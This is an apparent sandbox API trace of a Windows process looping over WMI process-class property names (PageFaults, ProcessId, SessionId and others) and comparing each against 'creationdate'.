[0401.588] IWbemClassObject:Get (in: This=0x331060, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.588] free (_Block=0x209680)
[0401.588] malloc (_Size=0x18) returned 0x209680
[0401.588] lstrlenW (lpString="OtherOperationCount") returned 19
[0401.588] lstrlenW (lpString="creationdate") returned 12
[0401.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherOperationCount", cchCount2=19) returned 1
[0401.589] free (_Block=0x209680)
[0401.589] IUnknown:Release (This=0x331060) returned 0x1
[0401.589] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.589] IWbemClassObject:Get (in: This=0x331310, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.589] free (_Block=0x209680)
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.589] IWbemClassObject:Get (in: This=0x331310, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.589] free (_Block=0x209680)
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.590] lstrlenW (lpString="OtherTransferCount") returned 18
[0401.590] lstrlenW (lpString="creationdate") returned 12
[0401.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherTransferCount", cchCount2=18) returned 1
[0401.590] free (_Block=0x209680)
[0401.590] IUnknown:Release (This=0x331310) returned 0x1
[0401.590] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.590] malloc (_Size=0x18) returned 0x209680
[0401.590] IWbemClassObject:Get (in: This=0x3315c0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.590] free (_Block=0x209680)
[0401.590] malloc (_Size=0x18) returned 0x209680
[0401.591] IWbemClassObject:Get (in: This=0x3315c0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.591] free (_Block=0x209680)
[0401.591] malloc (_Size=0x18) returned 0x209680
[0401.591] lstrlenW (lpString="PageFaults") returned 10
[0401.591] lstrlenW (lpString="creationdate") returned 12
[0401.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFaults", cchCount2=10) returned 1
[0401.591] free (_Block=0x209680)
[0401.591] IUnknown:Release (This=0x3315c0) returned 0x1
[0401.591] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.591] malloc (_Size=0x18) returned 0x209680
[0401.591] IWbemClassObject:Get (in: This=0x331870, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.591] free (_Block=0x209680)
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] IWbemClassObject:Get (in: This=0x331870, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.592] free (_Block=0x209680)
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] lstrlenW (lpString="PageFileUsage") returned 13
[0401.592] lstrlenW (lpString="creationdate") returned 12
[0401.592] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFileUsage", cchCount2=13) returned 1
[0401.592] free (_Block=0x209680)
[0401.592] IUnknown:Release (This=0x331870) returned 0x1
[0401.592] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] IWbemClassObject:Get (in: This=0x331b20, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.593] free (_Block=0x209680)
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.593] IWbemClassObject:Get (in: This=0x331b20, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.593] free (_Block=0x209680)
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.593] lstrlenW (lpString="ParentProcessId") returned 15
[0401.593] lstrlenW (lpString="creationdate") returned 12
[0401.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ParentProcessId", cchCount2=15) returned 1
[0401.593] free (_Block=0x209680)
[0401.593] IUnknown:Release (This=0x331b20) returned 0x1
[0401.593] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.594] IWbemClassObject:Get (in: This=0x331dd0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.594] free (_Block=0x209680)
[0401.594] malloc (_Size=0x18) returned 0x209680
[0401.594] IWbemClassObject:Get (in: This=0x331dd0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.594] free (_Block=0x209680)
[0401.594] malloc (_Size=0x18) returned 0x209680
[0401.594] lstrlenW (lpString="PeakPageFileUsage") returned 17
[0401.594] lstrlenW (lpString="creationdate") returned 12
[0401.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakPageFileUsage", cchCount2=17) returned 1
[0401.594] free (_Block=0x209680)
[0401.595] IUnknown:Release (This=0x331dd0) returned 0x1
[0401.595] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] IWbemClassObject:Get (in: This=0x332080, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.595] free (_Block=0x209680)
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] IWbemClassObject:Get (in: This=0x332080, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.595] free (_Block=0x209680)
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] lstrlenW (lpString="PeakVirtualSize") returned 15
[0401.595] lstrlenW (lpString="creationdate") returned 12
[0401.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakVirtualSize", cchCount2=15) returned 1
[0401.596] free (_Block=0x209680)
[0401.596] IUnknown:Release (This=0x332080) returned 0x1
[0401.596] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.596] IWbemClassObject:Get (in: This=0x332330, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.596] free (_Block=0x209680)
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.596] IWbemClassObject:Get (in: This=0x332330, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.596] free (_Block=0x209680)
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.597] lstrlenW (lpString="PeakWorkingSetSize") returned 18
[0401.597] lstrlenW (lpString="creationdate") returned 12
[0401.597] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakWorkingSetSize", cchCount2=18) returned 1
[0401.597] free (_Block=0x209680)
[0401.597] IUnknown:Release (This=0x332330) returned 0x1
[0401.597] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.597] malloc (_Size=0x18) returned 0x209680
[0401.597] IWbemClassObject:Get (in: This=0x3325e0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.597] free (_Block=0x209680)
[0401.597] malloc (_Size=0x18) returned 0x209680
[0401.597] IWbemClassObject:Get (in: This=0x3325e0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.598] free (_Block=0x209680)
[0401.598] malloc (_Size=0x18) returned 0x209680
[0401.598] lstrlenW (lpString="Priority") returned 8
[0401.598] lstrlenW (lpString="creationdate") returned 12
[0401.598] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Priority", cchCount2=8) returned 1
[0401.598] free (_Block=0x209680)
[0401.598] IUnknown:Release (This=0x3325e0) returned 0x1
[0401.598] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.598] malloc (_Size=0x18) returned 0x209680
[0401.598] IWbemClassObject:Get (in: This=0x332890, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.598] free (_Block=0x209680)
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.599] IWbemClassObject:Get (in: This=0x332890, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.599] free (_Block=0x209680)
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.599] lstrlenW (lpString="PrivatePageCount") returned 16
[0401.599] lstrlenW (lpString="creationdate") returned 12
[0401.599] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PrivatePageCount", cchCount2=16) returned 1
[0401.599] free (_Block=0x209680)
[0401.599] IUnknown:Release (This=0x332890) returned 0x1
[0401.599] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.600] IWbemClassObject:Get (in: This=0x332b40, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.600] free (_Block=0x209680)
[0401.600] malloc (_Size=0x18) returned 0x209680
[0401.600] IWbemClassObject:Get (in: This=0x332b40, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.600] free (_Block=0x209680)
[0401.600] malloc (_Size=0x18) returned 0x209680
[0401.600] lstrlenW (lpString="ProcessId") returned 9
[0401.600] lstrlenW (lpString="creationdate") returned 12
[0401.600] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ProcessId", cchCount2=9) returned 1
[0401.600] free (_Block=0x209680)
[0401.600] IUnknown:Release (This=0x332b40) returned 0x1
[0401.600] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] IWbemClassObject:Get (in: This=0x332df0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.601] free (_Block=0x209680)
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] IWbemClassObject:Get (in: This=0x332df0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.601] free (_Block=0x209680)
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] lstrlenW (lpString="QuotaNonPagedPoolUsage") returned 22
[0401.601] lstrlenW (lpString="creationdate") returned 12
[0401.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaNonPagedPoolUsage", cchCount2=22) returned 1
[0401.602] free (_Block=0x209680)
[0401.602] IUnknown:Release (This=0x332df0) returned 0x1
[0401.602] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.602] malloc (_Size=0x18) returned 0x209680
[0401.602] IWbemClassObject:Get (in: This=0x3330a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.602] free (_Block=0x209680)
[0401.602] malloc (_Size=0x18) returned 0x209680
[0401.602] IWbemClassObject:Get (in: This=0x3330a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.603] free (_Block=0x209680)
[0401.603] malloc (_Size=0x18) returned 0x209680
[0401.603] lstrlenW (lpString="QuotaPagedPoolUsage") returned 19
[0401.603] lstrlenW (lpString="creationdate") returned 12
[0401.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPagedPoolUsage", cchCount2=19) returned 1
[0401.603] free (_Block=0x209680)
[0401.603] IUnknown:Release (This=0x3330a0) returned 0x1
[0401.603] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.603] malloc (_Size=0x18) returned 0x209680
[0401.603] IWbemClassObject:Get (in: This=0x333350, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.603] free (_Block=0x209680)
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.604] IWbemClassObject:Get (in: This=0x333350, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.604] free (_Block=0x209680)
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.604] lstrlenW (lpString="QuotaPeakNonPagedPoolUsage") returned 26
[0401.604] lstrlenW (lpString="creationdate") returned 12
[0401.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakNonPagedPoolUsage", cchCount2=26) returned 1
[0401.604] free (_Block=0x209680)
[0401.604] IUnknown:Release (This=0x333350) returned 0x1
[0401.604] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.605] IWbemClassObject:Get (in: This=0x333600, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.605] free (_Block=0x209680)
[0401.605] malloc (_Size=0x18) returned 0x209680
[0401.605] IWbemClassObject:Get (in: This=0x333600, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.605] free (_Block=0x209680)
[0401.605] malloc (_Size=0x18) returned 0x209680
[0401.605] lstrlenW (lpString="QuotaPeakPagedPoolUsage") returned 23
[0401.605] lstrlenW (lpString="creationdate") returned 12
[0401.605] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakPagedPoolUsage", cchCount2=23) returned 1
[0401.605] free (_Block=0x209680)
[0401.605] IUnknown:Release (This=0x333600) returned 0x1
[0401.606] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] IWbemClassObject:Get (in: This=0x3338b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.606] free (_Block=0x209680)
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] IWbemClassObject:Get (in: This=0x3338b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.606] free (_Block=0x209680)
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] lstrlenW (lpString="ReadOperationCount") returned 18
[0401.606] lstrlenW (lpString="creationdate") returned 12
[0401.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadOperationCount", cchCount2=18) returned 1
[0401.606] free (_Block=0x209680)
[0401.607] IUnknown:Release (This=0x3338b0) returned 0x1
[0401.607] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] IWbemClassObject:Get (in: This=0x333b60, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.607] free (_Block=0x209680)
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] IWbemClassObject:Get (in: This=0x333b60, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.607] free (_Block=0x209680)
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] lstrlenW (lpString="ReadTransferCount") returned 17
[0401.607] lstrlenW (lpString="creationdate") returned 12
[0401.608] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadTransferCount", cchCount2=17) returned 1
[0401.608] free (_Block=0x209680)
[0401.608] IUnknown:Release (This=0x333b60) returned 0x1
[0401.608] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.608] IWbemClassObject:Get (in: This=0x333e10, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.608] free (_Block=0x209680)
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.608] IWbemClassObject:Get (in: This=0x333e10, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.608] free (_Block=0x209680)
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.609] lstrlenW (lpString="SessionId") returned 9
[0401.609] lstrlenW (lpString="creationdate") returned 12
[0401.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="SessionId", cchCount2=9) returned 1
[0401.609] free (_Block=0x209680)
[0401.609] IUnknown:Release (This=0x333e10) returned 0x1
[0401.609] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.609] malloc (_Size=0x18) returned 0x209680
